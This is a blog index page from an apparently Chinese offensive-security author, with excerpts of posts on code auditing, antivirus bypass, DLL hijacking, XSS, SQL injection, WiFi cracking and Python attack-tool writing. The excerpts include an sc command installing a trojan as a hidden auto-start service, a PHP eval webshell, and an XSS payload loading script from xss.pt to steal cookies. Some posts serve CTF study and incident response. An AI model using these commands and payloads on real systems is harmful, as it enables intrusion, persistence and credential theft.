自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

XunanSec的博客

巡安似海 — 关注web安全,热爱网络安全技术,热衷于渗透测试的个人技术博客,为大家分享最前沿的技术资源

  • 博客(28)
  • 收藏
  • 关注

原创 代码审计VauditDemo程序到exp编写

要对一个程序做系统的审计工作,很多人都认为代码审计工作是在我们将CMS安装好之后才开始的,其实不然,在安装的时候审计就已经开始了!一般安装文件为install.php或install/或include/目录下的某个文件 访问后开始进行安装,常见安装漏洞如下install.lock文件 在完成CMS的安装之后一般都会生成一个install.lock文件这个文件的作用就是 "防止网站误重启安装向导,导致重新安装"这个文件也被称为"安装锁定保护文件",它是以 ".lock"

2022-05-07 12:21:47 601

原创 记一次绕过安全狗与360艰难提权

端午短暂休息三天,复工之后朋友又丢给我一个,在打台球途中了解了一下这个奇怪的,说是无法执行命令,经过测试发现只能执行命令,确实奇怪,草草打了几局台球就回去拿起电脑开日菜刀上面写着当前用户为,但是执行任何命令都没有回显,要不是这个可以上传下载浏览文件,我都怀疑这个是假的了难道是禁用了高危函数吗?查看发现也没禁用呀至于这种没有任何回显的,一时间有点不知所措,那么就先翻一下文件吧(这是在没有思路情况下的一种思路)顺便也可以了解目标机器的环境,是否存在杀软,是否宝塔面板搭建的等等......每一个环境都有每一种思

2022-06-07 17:35:44 1858 1

转载 记一些linux安全应急排查思路和命令

0x00 前言都是蓝队一些很常用的应急排查命令0x01 防守排查基本流程1. 查看日志以及防守设备的日志,看看攻击情况(/在探测(是否有风险)/已经入侵成功) 探测中有风险就直接2. 进来的话看日志判断动了哪些资源 判断目的 提交报告 隔离服务环境 看判断漏洞位置 清理shell 及时修复 及时提交报告3. 根据攻击者ip 做一些溯源 比如威胁感知平台查查有些攻击者如果使用自己的vps ,看看上面是否有服务 有就可以进行找4. 搞进来了可以不立马杀死 投放诱饵文件 尝试反杀攻击者 根据攻击者特征(浏览

2022-06-02 18:51:26 361

原创 SC实现隐藏Windows服务维持权限

简介:sc.exe是Windows系统文件中自带的服务管理程序,可远程对服务进行操作;这里讲述了利用sc和Powershell程序来隐藏服务,搭到长期维持权限的效果。创建服务创建一个服务名为demo的自启动服务,服务运行地址指向木马路径,以tcpip协议传输并以本地系统权限运行sc create demo start= auto binPath="cmd.exe /k C:\tu.exe" depend= Tcpip obj= Localsystem添加个描述sc descr

2022-05-31 09:46:22 923

原创 记一次初学PHP反序列化

0x00 直接进入状态刚开始学习反序列化,此贴为记录初学的入门级反序列化的CTF题此题为Bugku的一道Web题,考点是反序列化和PHP的基本知识该题的标题为:点login咋没反应进入靶场之后,可以看到Login按钮是一个摆设,并没有提交功能右键查看源代码,只能看到一个css文件,点开看一下第一行就是一个注释,提示我们在Url后面添加?19737添加?19737之后,显示了源码这里我们只看PHP代码<?php error_reporting(0); ...

2022-05-29 11:39:09 448

原创 C++从虚表地址中取内容

开局一张图从地址中,调用虚表中的函数,上图!1、定义父类指针地址,申请子类内存空间cParent *cp = new cSon;2、获取虚表的首地址cp 指针变量int* 强转为int类型* 再取*,表示取虚表的首地址为什么​​*​​是取虚表呢,因为cp指针变量本身就是父类地址申请的子类空间,就是虚析构*(int*)cp3、虚表首地址取到了,接下来该取虚表中的第一个元素首地址将虚表首地址强转为int类型,加0...

2022-05-28 09:30:00 372

原创 实战挖掘某出版社漏洞集合

0x00 前言之前挖漏洞时,碰到的一个出版社漏洞,也是挺有名的,看码猜社哈哈。0x01 主站XSS主页搜索框,发现是get传参http://www.*****.com/so.htm?&KEY=1%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E个人中心XSS可打Cookie基本资料,昵称处限制了长度,直接插入payload<sCRiPt sRC=http://xss.pt/xxxx>&l

2022-05-27 13:21:02 685

原创 网鼎杯-青龙组-Web-Wp

0x01 开局一张图一看就知道让我们代码审计对于这种一长串的源码,还是逐步来解把首先的解题思路就是查看CTF题目的命名和代码函数CTF题目这里命名为AreUSerialz,我反正一眼看不出什么端详,打的CTF比较少,直接看函数名字在下面可以看到有一个unserialize()函数,那这一题基本上就是考反序列化的知识了。我们整体的浏览一边代码,来看一下程序的大概走向。<?phpinclude("flag.php");highlight_file(__FILE__);cl

2022-05-26 07:45:00 1171

原创 Burp半自动时间盲注

0x00 直接开始实战中碰到延时的注入点,一个一个测太麻烦,Python脚本又不会写,那我们就善用Burp。首先要构造好注入语句,接着使用Burp抓包发送到爆破模块去掉所有变量,设置两个变量第一个是数据库的名字位,第二个是数据库名字符对应的ASCII码爆破两个变量 选择Cluster bomb模式设置payload第一个Payload是数据库的名字位一共有5位,那么我们设置1~5即可第二个Payload是数据库名字对应的ASCII码,ASCII码最大

2022-05-25 12:48:42 760 1

原创 简单实现程序DLL劫持

0x00 前言程序启动会调用固定的.dll文件,通过特定的手法将木马代码和进程注入到可被劫持的DLL文件中,当程序正常启动,我们代码也会秘密执行。0x01 利用过程用到的工具1、Aheadlib2、Visual Studio用美图看看Pdf来测试,朋友们可以拿这个练手,毕竟只有一个.dll文件,小傻瓜都知道是调用的这个dll来启动程序的找到易劫持的dll文件,打开Aheadlib,引入注意这里设置的原始dll文件名,记住了最后正常dll名字要修改成这个点击生成会

2022-05-24 11:51:16 2062

原创 【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

0x00 存储XSS1) 可绕过的XSS给大家分享个漏洞案例,今天上午刚把电脑修好某技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击)注册处:http://xxx.edu.cn/meol/xxxx需要注册才能进入社区发表,先说下储存XSS,过滤了,发现可绕过储存XSS:http://xxx.edu.cn/meol/xxx?genre=80&type=0他是先过滤再输出,而不是输出时过滤,从而导致可绕过我们发现他输入时就进行了过滤,直接替换<script>a.

2022-05-23 09:47:56 563

原创 (总结)绕过CDN查找真实IP

网上也有很多的相关文章,这里仅说一些最实用的方法首先,我们要去判断是否存在CDN,然后再去查找真实IP0x01 判断是否存在CDN1) 利用pinghttp://ping.chinaz.com/http://ping.aizhan.com/使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN,同时要查看IP归属地2) 利用nslookupnslookup 进行检测,原理同上,如果返回域名解析对应多个 IP 地址多半是使用了 C

2022-05-22 12:41:59 1220

原创 XSS漏洞利用方式总结

前言:最近一直在挖漏洞,碰到的XSS漏洞最多了,今天就顺便来讲一下,如有错的地方,烦请指出。00×1什么是XSS漏洞: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 ​00×2 XSS漏洞有什么危害:1、盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号...

2022-05-21 07:45:00 4795 1

原创 【PyHacker编写指南】经常会用到的模块

这节是巡安似海PyHacker系列的最后一节慕然回首URL采集工具,后台扫描器,端口扫描编写....00x1:需要用到的模块如下:(仅举例常用方法)import randomimporttimeimportplatformimportsys00x2:Random模块 #常用于随机数随机生成 1-10中的其中一位:random.randint(1,10)生成一个随机数:random.random()listx = ['xc','www....

2022-05-20 10:20:22 115

原创 【PyHacker编写指南】爆破一句话密码

这节课是巡安似海PyHacker编写指南的《编写漏洞POC》使用Python编写一句话密码爆破工具,解脱双手。编写环境:Python2.x00x1:需要用到的模块如下:importrequests00x2:首先我们了解一下一句话马,一般post传递参数一个简单的php一句话<?phpeval($_POST['x'])?>OK,没问题,我们用浏览器打开传参看一下由此可以看到密码为x,变量提交能匹配上即执行echo语句这时我猜大家都有.

2022-05-19 12:48:49 224

原创 【PyHacker编写指南】实战编写漏洞POC

这节课是巡安似海PyHacker编写指南的《编写漏洞POC》经过前面的几节PyHacker系列的沉淀,这节课来讲讲如何编写漏洞POC实现自动化。编写环境:Python2.x

2022-05-18 12:34:36 1017

原创 【PyHacker编写指南】网站Cms识别工具

这节课是巡安似海PyHacker编写指南的《打造网站Cms识别工具》喜欢用Python写脚本的小伙伴可以跟着一起写一写呀。编写环境:Python2.x

2022-05-17 11:20:01 648

原创 【PyHacker编写指南】XSS检测脚本编写

这节课是巡安似海PyHacker编写指南的《XSS检测脚本编写》喜欢用Python写脚本的小伙伴可以跟着一起写一写。编写环境:Python2.x

2022-05-16 18:31:15 1054

原创 【PyHacker编写指南】Sql注入脚本编写

这节课是巡安似海PyHacker编写指南的《Sql注入脚本编写》有些注入点sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本来注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。喜欢用Python写脚本的小伙伴可以跟着一起写一写。

2022-05-15 18:02:14 2298

原创 【PyHacker编写指南】Nmap模块实现端口扫描

这节课是巡安似海PyHacker编写指南的《端口扫描器编写》引用Nmap库实现扫描功能,本节课比较简单一看就会。编写环境:Python2.x

2022-05-14 09:15:00 236 1

原创 【Pyhacker编写指南】端口扫描器

这节课是巡安似海PyHacker编写指南的《端口扫描器编写》主要是以Nmap举例编写,其中涉及的协议暂不过多讨论,喜欢用Python写脚本的小伙伴可以跟着一起写一写呀。编写环境:Python2.x

2022-05-13 11:50:34 390

原创 【PyHacker编写指南】打造网站后台扫描器

这节课是巡安似海PyHacker编写指南的《打造网站后台扫描器》包括如何处理假的200页面/404智能判断等喜欢用Python写脚本的小伙伴可以跟着一起写一写呀。编写环境:Python2.x

2022-05-12 11:15:01 345

原创 【PyHacker编写指南】打造URL批量采集器

这节课是巡安似海PyHacker编写指南的《打造URL批量采集器》喜欢用Python写脚本的小伙伴可以跟着一起写一写呀。编写环境:Python2.x

2022-05-11 11:27:32 489

原创 编写WAF指纹探测与Sqlmap相结合

使用Python编写探测WAF指纹脚本,再结合到Sqlmap中,这样以后再探测网站时,如果识别到此WAF指纹,就会显示出来。

2022-05-10 11:47:04 493

原创 SRC中验证码绕过思路总结

总结了一下SRC中常见的验证码绕过思路

2022-05-09 11:33:32 424

原创 一次实战挖掘软件逻辑漏洞

软件不仅仅限于逆向挖掘,还要了解它的功能,尽而寻找它的缺陷,所谓知己知彼百战不殆。用两个案例带大家了解一下。案例1:百度云限速众所周知,所以网上也有很多突破限速的软件,SpeedPanX 极速版的付费软件,速度还不错,按流量计费。情景:下载列表下载一个8G文件时,但极速下载流量只剩4G了主要看剩余流量这一栏,流量并不是随时间流逝而减少的我原来还剩有4G流量,然后用掉了1G多,现在还剩2.21G当剩余两个下载文件大小超过2.21G时,下载仍然继续。截止的时候

2022-05-08 11:36:37 134 1

原创 盘点那些Wifi破解姿势(2)

前面讲了WIFI密码破解的两种姿势,这节讲airodump-ng、EWSA、等其他姿势获取WIFI密码。

2022-05-06 11:45:33 3077

原创 盘点那些Wifi破解姿势(1)

WiFi的时代,蹭WiFi成为了一项基本"生存技能"。外出出差时,你想搞点事情,毫无疑问,wifi作为目标是最好的选择。

2022-05-05 23:33:20 4284

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除